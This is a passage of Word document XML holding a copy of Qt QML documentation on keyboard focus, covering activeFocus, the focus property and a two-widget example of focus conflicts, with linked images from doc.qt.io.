          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Whether or not an</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2240" w:history="1">
        <w:r w:rsidRPr="0034282A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>has active focus can be queried through the</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item::activeFocus</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">property. For </w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, here we have a</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2241" w:history="1">
        <w:r w:rsidRPr="0034282A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Text</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type whose text is determined by whether or not it has active focus.</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Text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text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activeFocus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"I have active focus!"</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"I do not have active focus"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="0034282A">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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BC6C9E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1903" w:name="acquiring-focus-and-focus-scopes"/>
      <w:bookmarkStart w:id="1904" w:name="_Toc483000942"/>
      <w:bookmarkStart w:id="1905" w:name="_Toc483003933"/>
      <w:bookmarkStart w:id="1906" w:name="_Toc483604285"/>
      <w:bookmarkStart w:id="1907" w:name="_Toc483605505"/>
      <w:bookmarkEnd w:id="1903"/>
      <w:r w:rsidRPr="00BC6C9E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Acquiring Focus and Focus Scopes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1904"/>
      <w:bookmarkEnd w:id="1905"/>
      <w:bookmarkEnd w:id="1906"/>
      <w:bookmarkEnd w:id="1907"/>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="0034282A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>An</w:t>
      </w:r>
      <w:r w:rsidR="00BC6C9E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2242" w:history="1">
        <w:r w:rsidRPr="0034282A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00BC6C9E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>requests focus by setting the</w:t>
      </w:r>
      <w:r w:rsidR="00BC6C9E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>focus</w:t>
      </w:r>
      <w:r w:rsidR="00BC6C9E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property to</w:t>
      </w:r>
      <w:r w:rsidR="00BC6C9E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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9B5FE9">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For very simple cases simply setting the</w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>focus</w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property is sometimes sufficient</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. If we run the following </w:t>
      </w:r>
      <w:r w:rsidRPr="009B5FE9">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2243" w:history="1">
        <w:r w:rsidRPr="0034282A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmlscene</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, we see that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keyHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type has active focus and pressing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A</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</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B</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, or</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C</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>keys modifies the text appropriately.</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle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"lightsteelblue"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240</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height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25</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Text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id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myText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Item</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id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keyHandler</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focus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Keys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onPressed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Key_A</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myText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A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else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Key_B</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myText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B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else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Key_C</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myText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C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34282A">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w: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HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/declarative-qmlfocus1.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/declarative-qmlfocus1.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/declarative-qmlfocus1.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus1.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus1.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus1.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus1.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus1.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus1.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus1.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus1.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus1.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus1.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus1.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1054" type="#_x0000_t75" alt="" style="width:129.6pt;height:21.9pt">
            <v:imagedata r:id="rId2244" r:href="rId2245"/>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00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="0034282A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>However, were the above example to be used as a reusable or imported component, this simple use of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>focus</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C62FB3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property is no longer sufficient</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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C62FB3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To demonstrate</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, we create two instances of our previously defined component and set the first one to have focus. The intention is that when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A</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</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B</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, or</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C</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>keys are pressed, the first of the two components receives the event and responds accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034282A" w:rsidRPr="0034282A" w:rsidRDefault="0034282A" w:rsidP="0034282A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The code that imports and creates two MyWidget instances:</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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//Window code that imports MyWidget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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle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id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window</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"white"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240</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height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150</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Column</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anchors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centerIn</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parent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spacing</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15</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MyWidget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focus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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//set this MyWidget to receive the focus</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"lightblue"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MyWidget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"palegreen"</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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The MyWidget code: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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle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id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widget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"lightsteelblue"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175</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height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25</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radius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10</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antialiasing</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Text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id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anchors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centerIn</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parent</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focus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Keys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onPressed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Key_A</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A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else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Key_B</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B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else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Key_C</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C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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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34282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We want the first</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MyWidget</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object to have the focus, so we set its</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focus</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property to</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true</w:t>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. However, by running the code, we can confirm that the second widget receives the focus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C62FB3" w:rsidRDefault="0034282A" w:rsidP="00C62FB3">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/declarative-qmlfocus2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0034282A">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/declarative-qmlfocus2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00C50BB7">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/declarative-qmlfocus2.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus2.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus2.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus2.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus2.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus2.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus2.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus2.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus2.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus2.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus2.png"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"http://doc.qt.io/qt-5/images/declarative-qmlfocus2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1055" type="#_x0000_t75" alt="" style="width:180.3pt;height:115.2pt">
